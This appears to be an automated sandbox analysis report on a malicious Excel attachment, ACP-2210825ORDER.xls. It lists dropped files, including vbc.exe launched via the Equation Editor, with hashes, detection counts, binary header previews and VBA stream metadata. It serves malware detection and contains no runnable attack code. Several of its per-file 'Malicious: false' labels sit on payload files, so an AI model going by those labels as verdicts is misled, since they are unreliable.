SSDEEP:	12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
MD5:	4A103FC1809C8EA381D2ACB5380EF4F6
SHA1:	6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
SHA-256:	1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
SHA-512:	77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\628281DB.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	321644
Entropy (8bit):	2.239527826723405
Encrypted:	false
SSDEEP:	768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
MD5:	35F7C4CEEC52F37D0B0881CCC3A7612D
SHA1:	3FC1E0B485071C1725703E6CB1029485B895765F
SHA-256:	17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
SHA-512:	ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
Malicious:	false
Preview:	....l...............m............J..sK.. EMF....l...8...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................{.......%...........%...........R...p................................@."C.a.l.i.b.r.i......................................................x$....._..f.x.@..%....._..._.....l._..._.RQ.Rl._.d._......._.P._.$Q.Rl._.d._. ...Id.xd._.l._. ............d.x................................@1......%...X...%...7...................{$..................C.a.l.i.b.r.i.......,._....x..y.._..._..8.x........dv......%...........%...........%...................................!.......................{......."...........%...........%...........%...........T...T..........................@.E.@....n.......L...............{.......P... ...6...F...........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D0DCC2.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	2.2724443756862973
Encrypted:	false
SSDEEP:	96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
MD5:	831E92F84F915D931EE02260D16AC145
SHA1:	51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
SHA-256:	C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
SHA-512:	E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
Malicious:	false
Preview:	....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BAF1916.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	321644
Entropy (8bit):	2.239527826723405
Encrypted:	false
SSDEEP:	768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
MD5:	35F7C4CEEC52F37D0B0881CCC3A7612D
SHA1:	3FC1E0B485071C1725703E6CB1029485B895765F
SHA-256:	17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
SHA-512:	ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
Malicious:	false
Preview:	....l...............m............J..sK.. EMF....l...8...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................{.......%...........%...........R...p................................@."C.a.l.i.b.r.i......................................................x$....._..f.x.@..%....._..._.....l._..._.RQ.Rl._.d._......._.P._.$Q.Rl._.d._. ...Id.xd._.l._. ............d.x................................@1......%...X...%...7...................{$..................C.a.l.i.b.r.i.......,._....x..y.._..._..8.x........dv......%...........%...........%...................................!.......................{......."...........%...........%...........%...........T...T..........................@.E.@....n.......L...............{.......P... ...6...F...........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7C3885.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	2.2754571047715912
Encrypted:	false
SSDEEP:	96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
MD5:	38A09794AE082E08EA4F8B6E517F4814
SHA1:	8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
SHA-256:	22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
SHA-512:	2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
Malicious:	false
Preview:	....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6BD8529.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	2.2724443756862973
Encrypted:	false
SSDEEP:	96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
MD5:	831E92F84F915D931EE02260D16AC145
SHA1:	51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
SHA-256:	C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
SHA-512:	E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
Malicious:	false
Preview:	....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	11776
Entropy (8bit):	5.656065698421856
Encrypted:	false
SSDEEP:	192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
MD5:	17ED1C86BD67E78ADE4712BE48A7D2BD
SHA1:	1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
SHA-256:	BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
SHA-512:	0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse Filename: 98765434567890.exe, Detection: malicious, Browse Filename: 98765434567890.exe, Detection: malicious, Browse Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: uWoMvSzdog.exe, Detection: malicious, Browse Filename: uWoMvSzdog.exe, Detection: malicious, Browse Filename: RFQ.exe, Detection: malicious, Browse Filename: RFQ.exe, Detection: malicious, Browse Filename: 21831nRdnc.exe, Detection: malicious, Browse Filename: 21831nRdnc.exe, Detection: malicious, Browse Filename: RFQ1258966.xls, Detection: malicious, Browse Filename: Factura.exe, Detection: malicious, Browse Filename: Factura.exe, Detection: malicious, Browse Filename: Qoute for 04261LOMO-01418-LALIZAS UAE.exe, Detection: malicious, Browse Filename: Qoute for 04261LOMO-01418-LALIZAS UAE.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF15E3E53C3844A1B8.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF357B58C09F937A89.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
Category:	dropped
Size (bytes):	1130496
Entropy (8bit):	7.090671625727551
Encrypted:	false
SSDEEP:	24576:mLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXzmZr5XXXXXXXXXXXXUXXXXXXXSXXXd:Ch
MD5:	0E013B64C85479178FE144D0F1AB7C4B
SHA1:	D05316B326B2DA075C00246DE6E3CBFB8B255A96
SHA-256:	CAB79276FB8419A70BAAC774C9DB91D16ED1DADF5F5624C4148E7F1975FDFF94
SHA-512:	34699E3C80C5F5E95C876D5794E05701C1726E04A46AF9976CB6415551688B97F39DFC78556F4F7A0588B4E24111663F7BAC1D188E80F256BAE5821BAFCCE5B0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................m...n...\...]...^...............................n.......p...........................................................................................................................................................................................................................................................................................................................................................................................H...............................................................................................i...Z........... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Temp\~DFEB3257B002629434.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.Bib

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	178824
Entropy (8bit):	6.515135274289935
Encrypted:	false
SSDEEP:	1536:Aqnh3ZWvlivpBh2LolEVEF+F2MVQ454gp3cHE6xBiP29vpAX5D57DwVaDXW:RkYzh2Lol/FdUJNfPgk5DVDUd
MD5:	52F571D999E9DD5B6ABFFE0CC9BF8DF3
SHA1:	67743CD31368EA4C7C350C5071A6B1D8A5AF400B
SHA-256:	7CC58916DBEADFF389E9375FD1F8973DB606156E953F309C55C40384E54765E3
SHA-512:	0BA04B8CDA196099229824B65348B71483D50377D10660AF8CD70A10919A310D88DDBA80D1F595524F71764BB2A765C87B9E5E2276391B11A272A52E3BBA7C11
Malicious:	false
Preview:	...6.{..N..p2...H.=L.]......l..b.0..2).v..X..~..q..nm.9..$h....YZ..}..V.u..E.a(M..........q......@9.n.`7......z.N...<...&..h..\.....&.h@p.....%.~5._b..b........B(....:.4......t.S0..J..0.h.&..H.t.gV.&..y.,J.3...m..\.......~n..L.AnI.....C.a.7w^!9.D.]J.....p...C8..Hn.....14.\|.. ...k........_9......@%......S..d.>.I.9.@.....l.....,.4G.l.}..e....<......]...wj.Z.^...j.Fv.#..9n.c{.`..4U...,Q...v.g.t)..o...g......E.}..9...1....Wbl..JT%8..m[x.a.u.7.i)......1+..$l@...x$.~......6q.BE.x..7...n.n..gOZ.V.7..6.a!.c....`.vGm).."L#~..E......tV.....DjX.....Z.>..Z.).c...............D7}d.v.. ..%...v.fH.....Cw..x.^......b\ct....Y..g.b...1*cR..%6F'.......Q-.......GH....L!?1...<.^Rf.G.H[O.<.Ke.....R..._e..1..s........y.~..x!...Tl.... .a .;..KG.]%:."%.O..X.S..b..t.o{.......#..9...b..J.e..w...<~b........5................XC....Z....E.zE.g.k.X.^.=.W)...>.'K.h<.C\././.7.d......~./.a~.Yc.......4...{....d..m."...v........v"......iY....9..ka.....M...m.}).....Y..f..-..4..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	119298
Entropy (8bit):	7.998253263209972
Encrypted:	true
SSDEEP:	1536:6JcdhM4/003cKP7zr9UE0q19q9MUxJ0O1mwVrLSft3KeDQMjE4le/l1NUYeECfZm:LdhM4/Fpb/1Ca2LEt9DQMA4lGVUh14B
MD5:	251C92F85825E5BBBE4D7624FC7F4AE4
SHA1:	BF396458B8D37DCC5880B29A7482A4896828C35F
SHA-256:	20694D441EEAB696B6D6AE5B7785BB0CAD19E1708EF49C28737CAD1805B49CDC
SHA-512:	5730DF53CE6DE9791F81287EA340ECDECEF1B99B80DC7501F9739083AF5D66543795E82C19388522580A43B8553FEAA2D5C0B419502BC7325E34F1862BBD44DD
Malicious:	false
Preview:	...Ct.m.j\i...G..@k......D.....W.S.CE.P'.O....9l....4Y%\.R...%..'.D.o.%9h........vP.h0...E_..1.}................{...).h....F.r..lm....D..{..dF4.@F..=.....G..&....... v47.L..V..%.$x..rK..ue=.w.)..+b...$.m.Gj..@x.3...14J...#"....G\| v8@Y2.R..v.."j...~.,..<..}...&H9F..v..=....>;......HF..c...~..'c.f.p0"...>Q\|./."...n..t.............$^.Z.c....h(.df.B..`,..#.?s.8..k'.B.t.....<3..s..h-).Q..\R.O.C=.c.<S..b(..Q#.....r...j..z...U.vU.>..C...@...G-..7=.....".mu52.[...`Bf}0q.V.lF.\|(.pMo...^L.l.@.#[bH...1..I.l.Mi..iB..(N"$e.....r..9....1z.2..P.GH..p....sE..O.cR.l.Z.H/.u_.Z+"Rk.M.g..q....Z..{0...g....,:....t..QF2.oA.v{....h.....TIN...r.. O.u..P...(........G.....+kk%9W.b.I.Q.....Gy9^~./..Q8..!o]$.5.....4. };......80....ze.^l....WL.b....!..0.N.{Q...'.....I..dnP....7.p..aB.w.Z.v]R.../r.C6(q.C...%...n....2@..0$.X.;CW.1...5...s#.]..x[h..T./.>.(...dJ...q?._.I....K...1'....9.).n1#..5:&.S3^........Z.Z.0.c._.'.....r;bw.P.....K.^.....(....'..4.?....N....#.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	131991
Entropy (8bit):	5.8780987492725405
Encrypted:	false
SSDEEP:	1536:v6J1cdTEl2OzvUtevCuoCW9fPr+vo9F5J7YWv3vbRnBycYWOGWSeaGymtYWOGWSS:VdW2OLgNCwXKSH8WPvVBjA+KE8S5
MD5:	10D998CF80B4437C2979B25EBCBE16D1
SHA1:	79C99DD2ABB99253E41C5E40DAB29522F93345BB
SHA-256:	A0A87BC30F4B39D7B642841A10208CE5286C6CA712B28B9D921E1EA6F547AEE6
SHA-512:	44863645B48815C3C248111F86440E3A0C515AF61B5A17D15B5A6C7304277F76056BCEB6C579E7824E11ADCA4DB3E385FA8019D602C40FA527E725C09B6AA523
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P........................................@......g}....`... .................................................lE...........................0.............................. i..(....................................................text...X...........................`..`.data........ ......................@....rdata...A...0...B..................@..@.pdata...............R..............@..@.xdata..X............`..............@..@.bss....p................................edata...............n..............@..@.idata..lE.......F...p..............@....CRT....X...........................@....tls......... ......................@....reloc.......0......................@..B........................................................................................................................................................................

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	477800
Entropy (8bit):	7.505402259729816
Encrypted:	false
SSDEEP:	12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
MD5:	7081C4822CF1C7572DD82822B8F27C49
SHA1:	4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
SHA-256:	B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
SHA-512:	6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@..........................p............@.............................................h............5..X............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...0...............................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
Entropy (8bit):	7.090542873047565
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	ACP-2210825ORDER.xls
File size:	1130496
MD5:	6c84860292e2a4d210396b7012be9b8a
SHA1:	7061c26320bf8836b55ac660860fa0937ae8f48e
SHA256:	cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
SHA512:	dbeb30f6ec918e82c13ed2aea4f14eeba7a38252fda3ebba49b63b0840a529b026cb36c40927b69d95970fe83c0b09c957a5b918d124eff97bfeaf3cda77a426
SSDEEP:	24576:XLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXpmSr5XXXXXXXXXXXXUXXXXXXXSXXXZ:sh
TLSH:	1135BE347893CE36D9A586347BA6D5B103037C733E548A5722C3732E1AF334265D6EAA
File Content Preview:	........................>...............................................................m...n...\...]...^...............................n.......p..............................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "ACP-2210825ORDER.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2022-11-29 05:27:07
Creating Application:
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 15 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] & g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 26 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 1e 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
